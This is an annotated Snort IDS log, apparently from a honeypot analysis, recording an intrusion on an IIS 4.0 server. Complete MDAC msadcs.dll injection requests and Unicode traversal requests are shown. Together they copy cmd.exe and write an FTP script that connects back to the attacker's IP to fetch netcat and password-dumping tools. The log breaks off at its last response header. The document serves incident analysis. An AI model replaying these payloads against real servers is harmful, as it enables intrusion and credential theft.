POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 573..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 364..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.
m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.
i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.
d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.
a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:38.482725 213.116.251.162:1850 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11624 IpLen:20 DgmLen:794 DF
***AP*** Seq: 0x9A6D82FF Ack: 0x2CBAD497 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 563..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 354..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.
e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.
o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.
:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.
c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:40.525442 213.116.251.162:1852 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11634 IpLen:20 DgmLen:782 DF
***AP*** Seq: 0x9A76DCCC Ack: 0x2CBADC4B Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 551..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 342..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.
s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.
c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.
t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r.
..m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# MDAC vulnerability is used to kick run the FTP client in scripted mode with the 'sassfile' script
!@# Again, the script file had no open command
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:38:42.452596 213.116.251.162:1854 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11645 IpLen:20 DgmLen:772 DF
***AP*** Seq: 0x9A7FBB13 Ack: 0x2CBAE41E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 541..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 332..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.
".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .
D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.
p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;.
..--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After about a minute and a half he/she uses the MDAC vulnerability to send the open command to self
!@# Again, this will not do anythin as the cmd.exe does not recognize 'open' as a valid command
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:11.229519 213.116.251.162:1857 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11673 IpLen:20 DgmLen:784 DF
***AP*** Seq: 0x9BD42341 Ack: 0x2CBC3E8E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 553..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 344..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .o.p.e.n. .2.1.3...1.1.6...2.
5.1...1.6.2.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.
c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.
n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.
r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC to append a username 'johna2k' to 'sassfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:13.430802 213.116.251.162:1859 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11684 IpLen:20 DgmLen:788 DF
***AP*** Seq: 0x9BDDEF1B Ack: 0x2CBC4779 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 557..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 348..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .j.o.h.n.a.2.k. .>.
>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t.
.A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.
i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.
t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to append password 'haxedj00' to 'sassfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:15.340768 213.116.251.162:1861 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11694 IpLen:20 DgmLen:790 DF
***AP*** Seq: 0x9BE6D101 Ack: 0x2CBC4EE8 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 559..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 350..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .h.a.x.e.d.j.0.0. .
>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.
t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.
w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.
s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to append commans to get tools to 'sassfile'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:17.354573 213.116.251.162:1863 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11704 IpLen:20 DgmLen:800 DF
***AP*** Seq: 0x9BEFE2A0 Ack: 0x2CBC5689 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 569..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 360..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .p.d.u.m.p.
..e.x.e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.
r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.
q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.
\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:19.358555 213.116.251.162:1865 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11714 IpLen:20 DgmLen:804 DF
***AP*** Seq: 0x9BF94C83 Ack: 0x2CBC5EA2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 573..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 364..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .s.a.m.d.u.
m.p...d.l.l. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.
i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.
d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.
a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:21.541600 213.116.251.162:1867 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11725 IpLen:20 DgmLen:794 DF
***AP*** Seq: 0x9C02E2E3 Ack: 0x2CBC671F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 563..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 354..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .g.e.t. .n.c...e.x.
e. .>.>.s.a.s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.
o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.
:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.
c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:23.571942 213.116.251.162:1869 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11736 IpLen:20 DgmLen:782 DF
***AP*** Seq: 0x9C0C21D3 Ack: 0x2CBC6F06 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 551..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 342..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e.c.h.o. .q.u.i.t. .>.>.s.a.
s.f.i.l.e.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.
c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.
t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r.
..m.d.b.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run ftp client with 'sassfile' script
!@# But nothing happens since an ftp connection is never opened. (This may lock these files)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:40:25.525415 213.116.251.162:1871 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11747 IpLen:20 DgmLen:772 DF
***AP*** Seq: 0x9C14D6EA Ack: 0x2CBC76C4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)..Host: la
b.wiretrip.net..Content-Length: 541..Connection: Keep-Alive....A
DCClientVersion:01.06..Content-Type: multipart/mixed; boundary=!
ADM!ROX!YOUR!WORLD!; num-args=3....--!ADM!ROX!YOUR!WORLD!..Conte
nt-Type: application/x-varg..Content-Length: 332..............S.
e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m.e.r.s. .w.h.e.r.e. .C.i.t.
y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f.t.p. .-.s.:.s.a.s.f.i.l.e.
".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .
D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.
p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;.
..--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerbility to make a copy of cmd.exe (named cmd1.exe)
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:03.136533 213.116.251.162:1874 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11783 IpLen:20 DgmLen:356 DF
***AP*** Seq: 0x9CA64B94 Ack: 0x2CBD0981 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../winnt/system32/cmd.e
xe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1..Accept:
*/*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..Use
r-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hot
bar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:03.245941 172.16.1.106:80 -> 213.116.251.162:1874
TCP TTL:127 TOS:0x0 ID:57720 IpLen:20 DgmLen:441 DF
***AP*** Seq: 0x2CBD0981 Ack: 0x9CA64CD0 Win: 0x20FC TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:39:58 GMT..Connection: close..Content-Length: 2
42..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
1 file(s
) copied...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to overwrite 'ftpcom' FTP script, this time starting with an open command.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:09.452882 213.116.251.162:1875 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11791 IpLen:20 DgmLen:380 DF
***AP*** Seq: 0x9CBF7851 Ack: 0x2CBD224E Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>f
tpcom HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Enco
ding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5
.01; Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connec
tion: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:09.578127 172.16.1.106:80 -> 213.116.251.162:1875
TCP TTL:127 TOS:0x0 ID:59000 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD224E Ack: 0x9CBF79A5 Win: 0x20E4 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:05 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:19.638247 213.116.251.162:1876 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11799 IpLen:20 DgmLen:368 DF
***AP*** Seq: 0x9CE70E10 Ack: 0x2CBD4A0C Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1
.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-A
live....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:19.678605 172.16.1.106:80 -> 213.116.251.162:1876
TCP TTL:127 TOS:0x0 ID:60280 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD4A0C Ack: 0x9CE70F58 Win: 0x20F0 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:15 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:29.810682 213.116.251.162:1877 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11808 IpLen:20 DgmLen:369 DF
***AP*** Seq: 0x9D0E32B4 Ack: 0x2CBD71CB Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/
1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Window
s NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-
Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:29.851630 172.16.1.106:80 -> 213.116.251.162:1877
TCP TTL:127 TOS:0x0 ID:61816 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD71CB Ack: 0x9D0E33FD Win: 0x20EF TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:25 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:39.973817 213.116.251.162:1879 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11822 IpLen:20 DgmLen:371 DF
***AP*** Seq: 0x9D363D8B Ack: 0x2CBD99A8 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+nc.exe+>>ftpcom HTT
P/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzi
p, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Wind
ows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Kee
p-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:40.013513 172.16.1.106:80 -> 213.116.251.162:1879
TCP TTL:127 TOS:0x0 ID:63096 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD99A8 Ack: 0x9D363ED6 Win: 0x20ED TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:35 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:50.116582 213.116.251.162:1880 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11830 IpLen:20 DgmLen:374 DF
***AP*** Seq: 0x9D5D8AB0 Ack: 0x2CBDC148 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+pdump.exe+>>ftpcom
HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:50.155871 172.16.1.106:80 -> 213.116.251.162:1880
TCP TTL:127 TOS:0x0 ID:64632 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBDC148 Ack: 0x9D5D8BFE Win: 0x20EA TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:45 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:00.324156 213.116.251.162:1881 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11838 IpLen:20 DgmLen:376 DF
***AP*** Seq: 0x9D853285 Ack: 0x2CBDE907 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+samdump.dll+>>ftpco
m HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding
: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection
: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:00.363806 172.16.1.106:80 -> 213.116.251.162:1881
